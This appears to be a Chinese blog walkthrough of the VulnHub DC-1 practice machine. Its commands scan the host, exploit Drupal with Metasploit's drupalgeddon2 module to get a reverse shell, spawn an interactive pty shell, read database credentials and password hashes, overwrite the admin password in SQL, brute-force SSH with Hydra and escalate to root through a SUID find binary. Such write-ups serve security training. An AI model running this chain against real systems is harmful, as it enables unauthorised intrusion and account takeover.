DC-1靶机通关教学(DC靶场系列)

已于 2024-08-26 14:18:23 修改
阅读量817 收藏 10
点赞数 28
文章标签: 网络安全 web安全 经验分享 linux
于 2024-08-26 14:11:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73413340/article/details/141561580
版权

靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/

下载完靶机之后需要在虚拟机运行,并且要和kali连接同一网段

一、(信息收集)主机发现

arp-scan -l -I eth2

通过扫描发现靶机ip地址是192.168.42.133

二、(信息收集)端口扫描

nmap -A -p- 192.168.42.133

发现目标靶机开放了22端口ssh服务、80端口http服务、111端口PRC服务等

由于开放了22端口,我们可以尝试去爆破一下,但是不行

但是通过扫描我们还发现了80端口,接下来进行访问web页面

三、web渗透

访问靶机ip地址得以下界面

此web服务使用了Drupal CMS模板

cms我们一般从cms出发找漏洞用工具Metasploit找一下漏洞

四、漏洞利用

1.漏洞查找,启动msfconsole使用search drupal搜索相关模块

msfconsole -q  ###安静的启动

search drupal  ###搜索drupal模块

2.漏洞利用,使用unix/webapp/drupal_drupalgeddon2)模块,RHOSTS目标靶机地址,LHOSTS本地kali地址,LPORT设置端口,run执行。

use unix/webapp/drupal_drupalgeddon2)  ###使用模块

set RHOSTS 192.168.42.133   ###此处ip地址为靶机地址

set LHOST 192.168.42.123   ###攻击端kali地址

set LPORT 4444   ###4444为端口需要设置未占用的端口

run

五、GatShell

5.1获得普通shell

然后执行ls命令

5.2获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'ww-data@DC-1:/var/www$

可以看到这个shell的权限只是普通权限,还不是root,不过还能看看文件啦,先看一下发现的flag1.txt文件

每个好的CMS都需要一个配置文件,你也一样,emmm,这个先放着,看看还有没有其他flag文件

好吧,就只有一个flag文件,根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的不过知道名字叫settings.php,我们可以用命令直接搜索并打开,内联执行

(好像不重要的样子),还意外收获了一个数据库,给了账号密码,先登一下看看

六、数据库渗透

由上面得到的用户密码登录进来mysql数据库

登进去了,这样我们就可以为所欲为修改数据库了,先看看有啥东西

接着使用数据库并查看表格

注意这个user这个表,先看一下有什么。注意改小一下字体不然可能会挤爆不美观

得到两个用户

admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR 

Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

密码好复杂,应该不是明文,那想登进后台就很难了就很难了,我们可以通过修改admin的密码,或者是新加一个admin

方法一、修改admin密码

我们得先找到加密文件,Drupal的加密脚本在/var/www/scripts/password-hash.sh 目录下,我们先退出mysql 查看加密脚本

这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123456 

得到加密后的密码, 接着我们登入mysql修改一下admin跟Fred的密码

use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

密码修改成功

方法二、添加admin权限用户

drupal7版本在有个SQL注入的漏洞,可以添加一个admin权限的用户,适用版本7.31以下,我们可以在msf找一下这个工具

然后看一下脚本的path

可以通过URL下载脚本使用,这里就不多展示了,接着我们用修改好的密码登入

 登进去就找到了flag3,提示了我们一些信息passwd和shadow,明显就是linux的文件

/etc/shadow  该文件存储了系统用户的密码等信息,只有root权限用户才能读取

接着我们查看一下用户信息

可以看到有flag4这个用户,我们有两个方法拿到这个用户的密码,一个是爆破,另一个就是提权打开shadow文件查看密码

七、用户密码爆破

利用工具Hydra爆破flag4的密码

爆破出密码orange,然后我们用kali连接ssh

查看到有一个flag4.txt文件cat看一下

打开了flag4.txt,emmm其实好像也没啥

八、提权

利用find命令,找查具有SUID权限的可执行二进制文件

finde比较常用,可以执行root权限的命令查找文件

可以看到已经提权成功了,接下来我们只要找到剩下的flag就算通关了

拿到第五个flag了,通关成功了

至此,打靶完成以上是我的实操经验,如果各位读者有不懂或者需要纠正的地方请在评论区留言指出,本人看到会第一时间回复

苗满空山
关注
  • 28
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1184
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1靶机渗透笔记
qq_60600840的博客
08-08 205
DC-1靶机安全、渗透、靶机
# 【oscp系列靶机1
weixin_44807430的博客
01-15 824
快速打通靶机
找不到靶机的IP怎么办,教你几步就会了
qq_20765511的博客
02-23 1万+
家人们最近从老家回来正在找工作,没时间,现在才开始写笔记 之前我学渗透的时候看着看着后面很简单,但是第一步就没了,找不到IP地址,这就很烦了,然后我在网上找,什么进入管理者界面修改啊什么的,但是我照着做了一遍,就是不知道IP是什么,不需要搞那些花里胡哨的东西 我教你个很简单的方法 我这个靶机是找朋友要的,所以我不知道IP地址,我看他们都是开机就会直接显示IP地址没有,我得自己找 一般来说靶机通常不会太大,通常是用 VirtualBox 这个虚拟机 打开来就是这样 你只需要在虚拟机VirtualBox 靶机
[渗透测试学习靶机01] vulnhub靶场 The Planets: Earth
weixin_47112073的博客
10-10 2810
渗透测试学习,vulnhub靶场练习Earth靶机
1、靶机——Pinkys-Place v3(1)
qq_55202378的博客
09-20 725
Pinkys-Place
OWASP靶机下载安装详细过程
热门推荐
xxx_Python的博客
05-22 2万+
OWASP靶机下载安装详细过程一、 OWASP靶机下载二、 VM虚拟机三、 OWASP安装四、 OWASP启动运行 一、 OWASP靶机下载 下载地址:https://sourceforge.net/projects/owaspbwa/files/. 一般可直接点击“Download Latest Version”下载最新版本的OWASP靶机 二、 VM虚拟机 安装可自行上网查看安装教程,本次使用VM15pro 三、 OWASP安装 保证磁盘容量有10G左右或以上,解压下载的OWASP压缩包 打开VM虚
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-1 靶机安装及练习
weixin_45451139的博客
01-24 2043
1. 靶机下载安装 下载地址DC-1 下好后,进行解压,得到一个 .ova 文件, 注意导入后将虚拟机的网络模式由桥接模式改为NAT模式 安装好后虚拟机界面如图: 2. 进行练习 2.1获取flag1文件 首先打开kali机,因为该靶机和kali在同一网段下,因此现在kali中输入ifconfig 进行查看kali机所在网段 由图可知,该kali机ip为192.168.220.128, 因此所在网段为192.168.220.0 然后,用nmap进行扫描该网段: nmap -sP 192.168.2
靶机渗透练习48-Hack Me Please
hirak0的博客
04-19 1060
靶机描述 靶机地址:https://www.vulnhub.com/entry/hack-me-please-1,731/ Description Difficulty: Easy Description: An easy box totally made for OSCP. No bruteforce is required. Aim: To get root shell 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.11 注:靶机
靶机三:CHRONOS_ 1
travelnight的博客
05-05 349
靶机三:CHRONOS: 1
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 4140
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享
靶机-AdmX_new
weixin_58602402的博客
06-16 186
利用bp将这个ip进行替换成靶机IP,到Proxy下的Options下的Match and Replace,先把里面的所有内容Remove掉。发现页面访问缓慢,F12进行查看,发现对ip192.168.159.145进行请求,没有这个ip。4.利用工具直接对wordpress后台密码进行爆破,admin/adam14。2.尝试登陆数据库失败,尝试直接切换用户wpadmin/adam14进行登陆。1.对目标站点进行目录扫描,发现wordpress目录。目录:/var/www/html/wordpress。
带你玩转渗透测试靶场Vulnhub——Android4
m0_74025111的博客
05-05 830
安卓(Android)是一种基于Linux内核(不包含GNU组件)的自由及开放源代码的操作系统。主要使用于移动设备,如智能手机和平板电脑,由美国Google公司和开放手机联盟领导及开发。Android操作系统最初由安迪·鲁宾开发,主要支持手机。2005年8月由Google收购注资。2007年11月,Google与84家硬件制造商、软件开发商及电信营运商组建开放手机联盟共同研发改良Android系统。随后Google以Apache开源许可证的授权方式,发布了Android的源代码。第一部Android智能手机
DC靶机系列DC-1
Ays.Ie的博客
02-22 619
本篇文章为DC系列第一个靶机,后续会持续更新DC系列其他靶机的渗透过程及思路,也会更新其他靶场的渗透内容,希望能够帮助有需要的同学
DC-7靶场
mlws1900的博客
03-27 1046
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
安全狐】靶机渗透_bulldog(附下载靶机地址)
安全狐
12-23 3784
目录 渗透测试の信息收集 一、主机发现 二、端口扫描(masscan/nmap) 三、端口服务 四、扫描子域名 五、渗透ing 六、反弹shell,提权 总结 靶机下载地址: 链接:https://pan.baidu.com/s/1UrPkBqoM-AshTiKOZCPRww 提取码:aqhu 渗透测试の信息收集 ( ip 系统信息 端口号 端口对应的服务 服务对应版本 子域名 whois c段 旁站等 ) 一、主机发现 方法1 nmap -sn 192.168.1...
一个遭受千百次攻击的良心学习靶机网站DVWA
hackerie的博客
09-15 1万+
话不多说,DVWA (Dam Vulnerable Web Application),一个供安全人员学习练手的优秀网站。以后该博客会慢慢收集类似的学习网站。希望大家共同进步!分享、学习、共同进步!
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值